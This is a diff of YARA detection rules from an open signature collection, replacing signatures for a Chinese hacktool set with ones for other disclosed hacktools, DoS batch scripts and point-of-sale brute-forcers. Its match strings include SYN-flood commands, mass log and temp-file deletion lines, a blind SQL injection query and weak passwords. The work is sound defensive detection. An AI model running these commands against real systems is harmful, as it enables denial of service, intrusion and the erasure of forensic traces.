-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L475-L491"
+		id = "d8f6784f-80c8-51e2-9d86-40022cd8705d"
+		date = "2014-11-17"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1275-L1298"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "44825e848bc3abdb6f31d0a49725bb6f498e9ccc"
-		logic_hash = "3fe00c08607d20daa055db2f551009ff1c447f1a651d4a78aba91621d53424f5"
-		score = 75
-		quality = 85
-		tags = "FILE"
+		hash = "55a05cf93dbd274355d798534be471dff26803f9"
+		logic_hash = "3a30cc602a66bd87304756311d56e7c698c1edb0b4b209198c589c4792776992"
+		score = 60
+		quality = 60
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Bienvenue dans un processus distant" fullword wide
-		$s2 = "klock.dll" fullword ascii
-		$s3 = "Erreur : le bureau courant (" wide
-		$s4 = "klock de mimikatz pour Windows" fullword wide
+		$s0 = "123456.com" fullword ascii
+		$s1 = "123123.com" fullword ascii
+		$s2 = "360.com" fullword ascii
+		$s3 = "123.com" fullword ascii
+		$s4 = "juso.com" fullword ascii
+		$s5 = "sina.com" fullword ascii
+		$s7 = "changeme" fullword ascii
+		$s8 = "master" fullword ascii
+		$s9 = "google.com" fullword ascii
+		$s10 = "chinanet" fullword ascii
+		$s12 = "lionking" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 907KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Dos_Down32 : FILE
+rule SIGNATURE_BASE_Hacktools_CN_Johor_Posts_Killer
 {
 	meta:
-		description = "Chinese Hacktool Set - file Down32.exe"
+		description = "Disclosed hacktool set - file JoHor_Posts_Killer.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e56c254d-1238-5786-8e8a-f9122b0310a9"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L493-L508"
+		id = "68bba78e-f3a0-5eaa-9c63-e5f23a76b328"
+		date = "2014-11-17"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1300-L1321"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0365738acd728021b0ea2967c867f1014fd7dd75"
-		logic_hash = "c1aaaaaaae2ea720d3fc1516d88d678895bcda81344e8c1f4f57e5a20e770123"
-		score = 75
+		hash = "d157f9a76f9d72dba020887d7b861a05f2e56b6a"
+		logic_hash = "2fc63cd42619a2b92ab8670b14ab4c01eb3b194cd337d329ba224b7088d26318"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "C:\\Windows\\Temp\\Cmd.txt" fullword wide
-		$s6 = "down.exe" fullword wide
-		$s15 = "get_Form1" fullword ascii
+		$s0 = "Multithreading Posts_Send Killer" fullword ascii
+		$s3 = "GET [Access Point] HTTP/1.1" fullword ascii
+		$s6 = "The program's need files was not exist!" fullword ascii
+		$s7 = "JoHor_Posts_Killer" fullword wide
+		$s8 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword ascii
+		$s10 = "  ( /s ) :" fullword ascii
+		$s11 = "forms.vbp" fullword ascii
+		$s12 = "forms.vcp" fullword ascii
+		$s13 = "Software\\FlySky\\E\\Install" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 137KB and all of them
+		5 of them
 }
-rule SIGNATURE_BASE_Marathontool_2 : FILE
+rule SIGNATURE_BASE_Hacktools_CN_Panda_Tesksd
 {
 	meta:
-		description = "Chinese Hacktool Set - file MarathonTool.exe"
+		description = "Disclosed hacktool set - file tesksd.jpg"
 		author = "Florian Roth (Nextron Systems)"
-		id = "20151673-6779-58ce-872c-81e74a96597d"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L510-L525"
+		id = "399ff307-c2e8-57bb-b792-a2c599e8686e"
+		date = "2014-11-17"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1323-L1338"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "75b5d25cdaa6a035981e5a33198fef0117c27c9c"
-		logic_hash = "7581b63a7bddeac93c65b2943b9f5f568464d8f300bc7385ca73880996bd390b"
-		score = 75
+		hash = "922147b3e1e6cf1f5dd5f64a4e34d28bdc9128cb"
+		logic_hash = "dc81acef0ad3e6307f68ee755e5b27f2dcf1e2822e560a72dc5ae572703f4459"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "http://localhost/retomysql/pista.aspx?id_pista=1" fullword wide
-		$s6 = "SELECT ASCII(SUBSTR(username,{0},1)) FROM USER_USERS" fullword wide
-		$s17 = "/Blind SQL injection tool based in heavy queries" fullword ascii
+		$s0 = "name=\"Microsoft.Windows.Common-Controls\" " fullword ascii
+		$s1 = "ExeMiniDownload.exe" fullword wide
+		$s16 = "POST %Hs" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Scanms_Scanms : FILE
+rule SIGNATURE_BASE_Hacktools_CN_Http : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file scanms.exe"
+		description = "Disclosed hacktool set - file Http.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "50393220-35ae-5d3b-ae3f-5d5eb036c043"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L527-L544"
+		id = "bbff6ff6-8cef-5a83-afd3-34f306e8e715"
+		date = "2014-11-17"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1340-L1356"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "47787dee6ddea2cb44ff27b6a5fd729273cea51a"
-		logic_hash = "d6b33e603953194dab67104cbb9649710515050cf73afb18b2c9083a9e228e6d"
-		score = 75
-		quality = 85
+		hash = "788bf0fdb2f15e0c628da7056b4e7b1a66340338"
+		logic_hash = "690b41bdf856e0d4d90b4a42524134302e9649018fdd495c359582aa6121a017"
+		score = 60
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "--- ScanMs Tool --- (c) 2003 Internet Security Systems ---" fullword ascii
-		$s2 = "Scans for systems vulnerable to MS03-026 vuln" fullword ascii
-		$s3 = "More accurate for WinXP/Win2k, less accurate for WinNT" fullword ascii
-		$s4 = "added %d.%d.%d.%d-%d.%d.%d.%d" fullword ascii
-		$s5 = "Internet Explorer 1.0" fullword ascii
+		$s0 = "RPCRT4.DLL" fullword ascii
+		$s1 = "WNetAddConnection2A" fullword ascii
+		$s2 = "NdrPointerBufferSize" fullword ascii
+		$s3 = "_controlfp" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and 3 of them
+		all of them and filesize < 10KB
 }
-rule SIGNATURE_BASE_CN_Tools_Pcshare : FILE
+rule SIGNATURE_BASE_Hacktools_CN_Burst_Start
 {
 	meta:
-		description = "Chinese Hacktool Set - file PcShare.exe"
+		description = "Disclosed hacktool set - file Start.bat - DoS tool"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0c4e9f9b-9839-56a0-be21-a4e9f19cdfdb"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L546-L565"
+		id = "1291fbc5-fbb3-5425-bb9a-e45f4d7cf562"
+		date = "2014-11-17"
+		modified = "2023-01-27"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1358-L1380"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ee7ba9784fae413d644cdf5a093bd93b73537652"
-		logic_hash = "57bd1629abe0af1345f505514b99deb4e63ebce7363f3b0abcb76e7201d9b7b7"
-		score = 75
+		hash = "75d194d53ccc37a68286d246f2a84af6b070e30c"
+		logic_hash = "b435957150da7b790809d2cf90a01c967127c183ddcbf333beda1a7c599b69a5"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "title=%s%s-%s;id=%s;hwnd=%d;mainhwnd=%d;mainprocess=%d;cmd=%d;" fullword wide
-		$s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" fullword wide
-		$s2 = "http://www.pcshares.cn/pcshare200/lostpass.asp" fullword wide
-		$s5 = "port=%s;name=%s;pass=%s;" fullword wide
-		$s16 = "%s\\ini\\*.dat" fullword wide
-		$s17 = "pcinit.exe" fullword wide
-		$s18 = "http://www.pcshare.cn" fullword wide
+		$s0 = "for /f \"eol= tokens=1,2 delims= \" %%i in (ip.txt) do (" ascii
+		$s1 = "Blast.bat /r 600" fullword ascii
+		$s2 = "Blast.bat /l Blast.bat" fullword ascii
+		$s3 = "Blast.bat /c 600" fullword ascii
+		$s4 = "start Clear.bat" fullword ascii
+		$s5 = "del Result.txt" fullword ascii
+		$s6 = "s syn %%i %%j 3306 /save" fullword ascii
+		$s7 = "start Thecard.bat" fullword ascii
+		$s10 = "setlocal enabledelayedexpansion" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 6000KB and 3 of them
+		5 of them
 }
-rule SIGNATURE_BASE_Pw_Inspector : FILE
+rule SIGNATURE_BASE_Hacktools_CN_Panda_Tasksvr
 {
 	meta:
-		description = "Chinese Hacktool Set - file pw-inspector.exe"
+		description = "Disclosed hacktool set - file tasksvr.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "888db647-c5d0-5b1b-bcd2-512c1ebeadea"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L567-L582"
+		id = "5c85b382-551a-5e9e-9af8-d106cbe26f74"
+		date = "2014-11-17"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1382-L1397"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4f8e3e101098fc3da65ed06117b3cb73c0a66215"
-		logic_hash = "3b54466d80692923b93689a9e43e30dfbc63e5982cb633120795817098d68e05"
-		score = 75
+		hash = "a73fc74086c8bb583b1e3dcfd326e7a383007dc0"
+		logic_hash = "183708e525ec6676662b59a2a3c79f5113a80f2d5b3bd4713c74a536fe303b2d"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "-m MINLEN  minimum length of a valid password" fullword ascii
-		$s2 = "http://www.thc.org" fullword ascii
-		$s3 = "Use for hacking: trim your dictionary file to the pw requirements of the target." fullword ascii
+		$s2 = "Consys21.dll" fullword ascii
+		$s4 = "360EntCall.exe" fullword wide
+		$s15 = "Beijing1" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 460KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Dll_Loadex : FILE
+rule SIGNATURE_BASE_Hacktools_CN_Burst_Clear
 {
 	meta:
-		description = "Chinese Hacktool Set - file Dll_LoadEx.exe"
+		description = "Disclosed hacktool set - file Clear.bat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "51235448-751e-51ce-93f8-da48eddb2b7f"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L584-L603"
+		id = "21f33a36-779e-5eac-819c-ef79f291b43c"
+		date = "2014-11-17"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1398-L1419"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "213d9d0afb22fe723ff570cf69ff8cdb33ada150"
-		logic_hash = "588f4f4d0a2f8f8e76de0a5b1217191c1cace69f934582d4fc3c974fb94b8c3e"
-		score = 75
+		hash = "148c574a4e6e661aeadaf3a4c9eafa92a00b68e4"
+		logic_hash = "d10ed2c6ea3f1a8b289529cc90f50f84288003576aced903f48db3c2abc4722d"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "WiNrOOt@126.com" fullword wide
-		$s1 = "Dll_LoadEx.EXE" fullword wide
-		$s3 = "You Already Loaded This DLL ! :(" ascii
-		$s10 = "Dll_LoadEx Microsoft " fullword wide
-		$s17 = "Can't Load This Dll ! :(" ascii
-		$s18 = "WiNrOOt" fullword wide
-		$s20 = " Dll_LoadEx(&A)..." fullword wide
+		$s0 = "del /f /s /q %systemdrive%\\*.log    " fullword ascii
+		$s1 = "del /f /s /q %windir%\\*.bak    " fullword ascii
+		$s4 = "del /f /s /q %systemdrive%\\*.chk    " fullword ascii
+		$s5 = "del /f /s /q %systemdrive%\\*.tmp    " fullword ascii
+		$s8 = "del /f /q %userprofile%\\COOKIES s\\*.*    " fullword ascii
+		$s9 = "rd /s /q %windir%\\temp & md %windir%\\temp    " fullword ascii
+		$s11 = "del /f /s /q %systemdrive%\\recycled\\*.*    " fullword ascii
+		$s12 = "del /f /s /q \"%userprofile%\\Local Settings\\Temp\\*.*\"    " fullword ascii
+		$s19 = "del /f /s /q \"%userprofile%\\Local Settings\\Temporary Internet Files\\*.*\"   " ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 120KB and 3 of them
+		5 of them
 }
-rule SIGNATURE_BASE_Dat_Report : FILE
+rule SIGNATURE_BASE_Hacktools_CN_Burst_Thecard
 {
 	meta:
-		description = "Chinese Hacktool Set - file report.dll"
+		description = "Disclosed hacktool set - file Thecard.bat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c77633a7-0c2f-5efa-b58b-635546bfec95"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L605-L619"
+		id = "a9946aeb-2042-522f-8d91-f8b96341bb64"
+		date = "2014-11-17"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1421-L1438"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4582a7c1d499bb96dad8e9b227e9d5de9becdfc2"
-		logic_hash = "e3b21f37fae388958758af535727844d6e9696862fd9968340e1a619592c53b6"
-		score = 75
+		hash = "50b01ea0bfa5ded855b19b024d39a3d632bacb4c"
+		logic_hash = "29e1fb2e0bfa60e5406f9fd1c0ec99f0fc1b416ffc4d59846627e40959a32c63"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<a href=\"http://www.xfocus.net\">X-Scan</a>" fullword ascii
-		$s2 = "REPORT-ANALYSIS-OF-HOST" fullword ascii
+		$s0 = "tasklist |find \"Clear.bat\"||start Clear.bat" fullword ascii
+		$s1 = "Http://www.coffeewl.com" fullword ascii
+		$s2 = "ping -n 2 localhost 1>nul 2>nul" fullword ascii
+		$s3 = "for /L %%a in (" ascii
+		$s4 = "MODE con: COLS=42 lines=5" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 480KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Dos_Iis7 : FILE
+rule SIGNATURE_BASE_Hacktools_CN_Burst_Blast
 {
 	meta:
-		description = "Chinese Hacktool Set - file iis7.exe"
+		description = "Disclosed hacktool set - file Blast.bat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8813b7a2-0d44-5f26-80ab-0f493c09a027"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L621-L638"
+		id = "9ac723c4-e88d-5fb3-b18f-c8b764c8acf3"
+		date = "2014-11-17"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1440-L1454"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0a173c5ece2fd4ac8ecf9510e48e95f43ab68978"
-		logic_hash = "e0cbcb63cd2a542e6394792070392d393b2a3485f5a5ef3c6ba0f113ae9270ec"
-		score = 75
+		hash = "b07702a381fa2eaee40b96ae2443918209674051"
+		logic_hash = "77902c7b23bab80d035f1dbe074554f16f99b2c9e31c80171296a1d33f705dac"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "\\\\localhost" fullword ascii
-		$s1 = "iis.run" fullword ascii
-		$s3 = ">Could not connecto %s" fullword ascii
-		$s5 = "WHOAMI" ascii
-		$s13 = "WinSta0\\Default" fullword ascii
+		$s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http:" ascii
+		$s1 = "@echo off" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 140KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Switchsniffer : FILE
+rule SIGNATURE_BASE_Vubrute_Vubrute
 {
 	meta:
-		description = "Chinese Hacktool Set - file SwitchSniffer.exe"
+		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file VUBrute.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6019f042-10ab-5899-8b1b-28b2609e9623"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L640-L654"
+		id = "7ac74c85-465c-5eb5-8e91-004f28cabb75"
+		date = "2014-11-22"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1456-L1472"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1e7507162154f67dff4417f1f5d18b4ade5cf0cd"
-		logic_hash = "4c75473399a7d47b63c6247248fd2792c675740ac671028b1c0a8ba1a02f35aa"
-		score = 75
+		hash = "166fa8c5a0ebb216c832ab61bf8872da556576a7"
+		logic_hash = "9dab03b70b249c0c481e3bc98c3196e83da93ea2723674d38baf32469392d52a"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "NextSecurity.NET" fullword wide
-		$s2 = "SwitchSniffer Setup" fullword wide
+		$s0 = "Text Files (*.txt);;All Files (*)" fullword ascii
+		$s1 = "http://ubrute.com" fullword ascii
+		$s11 = "IP - %d; Password - %d; Combination - %d" fullword ascii
+		$s14 = "error.txt" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Dbexpora : FILE
+rule SIGNATURE_BASE_DK_Brute
 {
 	meta:
-		description = "Chinese Hacktool Set - file dbexpora.dll"
+		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file DK Brute.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "43297ce9-60f3-5b69-b7d8-904fffe622fe"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L656-L671"
+		id = "c9ea0dcf-10f3-5161-aebc-2db04c24b0a5"
+		date = "2014-11-22"
+		modified = "2025-04-14"
+		reference = "http://goo.gl/xiIphp"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1474-L1491"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b55b007ef091b2f33f7042814614564625a8c79f"
-		logic_hash = "2dad6cedae6a3a446c2c4829516bffa5608ea4d1c13c907796cf4d13ec37965e"
-		score = 75
+		hash = "93b7c3a01c41baecfbe42461cb455265f33fbc3d"
+		logic_hash = "a48ba3513c9c99066e9dda02859089e9e1db15e7bd52443795771609f011c94a"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "SELECT A.USER FROM SYS.USER_USERS A " fullword ascii
-		$s12 = "OCI 8 - OCIDescriptorFree" fullword ascii
-		$s13 = "ORACommand *" fullword ascii
+		$s6 = "get_CrackedCredentials" fullword ascii
+		$s13 = "Same port used for two different protocols:" fullword wide
+		$s18 = "coded by fLaSh" fullword ascii
+		$s19 = "get_grbToolsScaningCracking" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 835KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Sqlcracker : FILE
+rule SIGNATURE_BASE_Vubrute_Config
 {
 	meta:
-		description = "Chinese Hacktool Set - file SQLCracker.exe"
+		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file config.ini"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7d7ff2cf-81fb-5a04-a97f-577c306137a9"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L673-L690"
+		id = "25cad108-b2d6-5886-bb2f-e614e05649fa"
+		date = "2014-11-22"
+		modified = "2025-04-14"
+		reference = "http://goo.gl/xiIphp"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1493-L1513"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1aa5755da1a9b050c4c49fc5c58fa133b8380410"
-		logic_hash = "3724f4b746da413f99880564ae72bc0de867120f1f7eacaf856d42492ebe359e"
-		score = 75
+		hash = "b9f66b9265d2370dab887604921167c11f7d93e9"
+		logic_hash = "b4c54d5ecb269c7310b5bd2a9e8fe5d6c75503f8cb1f25679399e25185d9cb51"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "msvbvm60.dll" fullword ascii
-		$s1 = "_CIcos" fullword ascii
-		$s2 = "kernel32.dll" fullword ascii
-		$s3 = "cKmhV" fullword ascii
-		$s4 = "080404B0" fullword wide
+		$s2 = "Restore=1" fullword ascii
+		$s6 = "Thread=" ascii
+		$s7 = "Running=1" fullword ascii
+		$s8 = "CheckCombination=" fullword ascii
+		$s10 = "AutoSave=1.000000" fullword ascii
+		$s12 = "TryConnect=" ascii
+		$s13 = "Tray=" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 125KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Freeversion_Debug : FILE
+rule SIGNATURE_BASE_Sig_238_Hunt
 {
 	meta:
-		description = "Chinese Hacktool Set - file debug.exe"
+		description = "Disclosed hacktool set (old stuff) - file hunt.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2d69a39a-0da5-56ca-87a5-9116dea6c950"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L692-L711"
+		id = "5d9d1f99-2f12-51e9-a554-b349e19d00fb"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1515-L1534"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d11e6c6f675b3be86e37e50184dadf0081506a89"
-		logic_hash = "f7f8302c70c5aed1885724a1bca4efdf0547cc5be62e7dd6bcd8cc2079f71f96"
-		score = 75
-		quality = 85
-		tags = "FILE"
+		hash = "f9f059380d95c7f8d26152b1cb361d93492077ca"
+		logic_hash = "66d22c4dc2864d61bd485d6840887905f020fce8e19bb976ec09acaa6ed0387c"
+		score = 60
+		quality = 83
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "c:\\Documents and Settings\\Administrator\\" ascii
-		$s1 = "Got WMI process Pid: %d" ascii
-		$s2 = "This exploit will execute" ascii
-		$s6 = "Found token %s " ascii
-		$s7 = "Running reverse shell" ascii
-		$s10 = "wmiprvse.exe" fullword ascii
-		$s12 = "SELECT * FROM IIsWebInfo" fullword ascii
+		$s1 = "Programming by JD Glaser - All Rights Reserved" fullword ascii
+		$s3 = "Usage - hunt \\\\servername" fullword ascii
+		$s4 = ".share = %S - %S" fullword wide
+		$s5 = "SMB share enumerator and admin finder " fullword ascii
+		$s7 = "Hunt only runs on Windows NT..." fullword ascii
+		$s8 = "User = %S" fullword ascii
+		$s9 = "Admin is %s\\%s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 820KB and 3 of them
+		all of them
 }
-rule SIGNATURE_BASE_Dos_Look : FILE
+rule SIGNATURE_BASE_Sig_238_Listip
 {
 	meta:
-		description = "Chinese Hacktool Set - file look.exe"
+		description = "Disclosed hacktool set (old stuff) - file listip.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "910d1469-9173-5a7d-91ea-a50ee921f662"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L713-L728"
+		id = "417faf20-ee07-5c3e-bfcf-89599e38e62e"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1536-L1554"
